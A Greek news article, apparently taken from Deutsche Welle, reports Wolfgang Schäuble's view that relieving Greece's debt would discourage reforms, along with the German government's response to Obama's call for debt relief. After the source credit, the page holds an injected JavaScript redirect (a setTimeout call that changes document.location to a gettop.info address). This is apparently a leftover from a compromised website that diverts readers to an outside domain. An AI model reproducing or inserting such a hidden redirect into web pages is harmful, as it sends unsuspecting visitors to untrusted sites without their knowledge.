Αμετανόητος Σόιμπλε: Κακή υπηρεσία για την Ελλάδα ενδεχόμενη ανακούφιση του χρέους

0
18

 

Ενδεχόμενη ανακούφιση του ελληνικού χρέους θα αποτελούσε κακή υπηρεσία για την Ελλάδα, υποστήριξε αργά χθες το βράδυ ο Γερμανός υπουργός Οικονομικών Βόλφγκανγκ Σόιμπλε, αναφέρει η εφημερίδα Passauer Neue Presse.

«Όποιος λέει ‘θα ανακουφίσουμε τα χρέη σας’ προσφέρει κακή υπηρεσία στην Ελλάδα», δήλωσε ο Σόιμπλε, σύμφωνα με την Passauer Neue Presse.

Οι υπουργοί Οικονομικών της ευρωζώνης θα συζητήσουν μια εκτεταμένη ελάφρυνση του χρέους για την Ελλάδα κατά τη συνεδρίασή τους τον ερχόμενο μήνα. Ο Αμερικανός πρόεδρος Μπαράκ Ομπάμα εξέφρασε επίσης χθες την αλληλεγγύη του προς την Ελλάδα όσον αφορά το χρέος της, ανέφερε στο δημοσίευμα της η εφημερίδα.

Mιλώντας στην πόλη Πασάου, ο Βόλφγκανγκ Σόιμπλε επέμεινε πως εάν γίνει η ελάφρυνση χρέους, αυτό θα σταθεί αφορμή για την Αθήνα, ώστε να μην κάνει μεταρρυθμίσεις.

Όπως είπε χαρακτηριστικά:

Εάν η Ελλάδα θέλει σκληρό νόμισμα (ευρώ), θα πρέπει να μετασχηματίσει τη διοίκηση της και την οικονομία της ώστε να γίνουν ανταγωνιστικά. Βοηθάμε την Ελλάδα, αλλά αν πούμε στους Έλληνες «θα συγχωρήσουμε τα χρέη σας», αυτό θα ήταν κακή υπηρεσία, καθώς δεν θα κάνουν άλλες μεταρρυθμίσεις.

Στο μεταξύ και η Άνγκελα Μέρκελ απάντησε ουσιαστικά αν και δια μέσω του εκπροσώπου της, Στέφεν Ζάιμπερτ, πως δεν πρόκειται να αλλάξει στάση στο θέμα του χρέους.

«Λάβαμε υπόψη μας ότι ο πρόεδρος Ομπάμα υπέδειξε τη σημασία της ελάφρυνσης του χρέους. Επ’ αυτού, το Eurogroup συμφώνησε το Μάιο για ένα χάρτη πορείας ο οποίος ρυθμίζει τα επόμενα βήματα σε ό,τι αφορά τα βραχυπρόθεσμα μέτρα όπως, και για αργότερα, το 2018, τα μεσοπρόθεσμα μέτρα» είπε ο κ. Ζάιμπερτ.

Αναφορικά με τη ανακοίνωση του αμερικανού προέδρου στην Αθήνα πως σκοπεύει να εκθέσει στο Βερολίνο την άποψη του ότι «η λιτότητα μόνη της δεν δημιουργεί ευημερία» ο Στέφεν Ζάιμπερτ διαβεβαίωσε ότι ανάλογη γνώμη έχει και η γερμανική κυβέρνηση.

Το Βερολίνο πιστεύει ότι οι δύο βασικοί παράγοντες για την οικονομική ανάπτυξη είναι βιώσιμοι κρατικοί προϋπολογισμοί και αναγκαίες διαρθρωτικές μεταρρυθμίσεις. «Αυτή ήταν πάντα η στάση μας» τόνισε ο Γερμανός κυβερνητικός εκπρόσωπος «και σε αυτή τη βάση χαράζαμε την πολιτική μας σε ό,τι αφορά την Ελλάδα».

 

Πηγή: Deutsche Welle setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here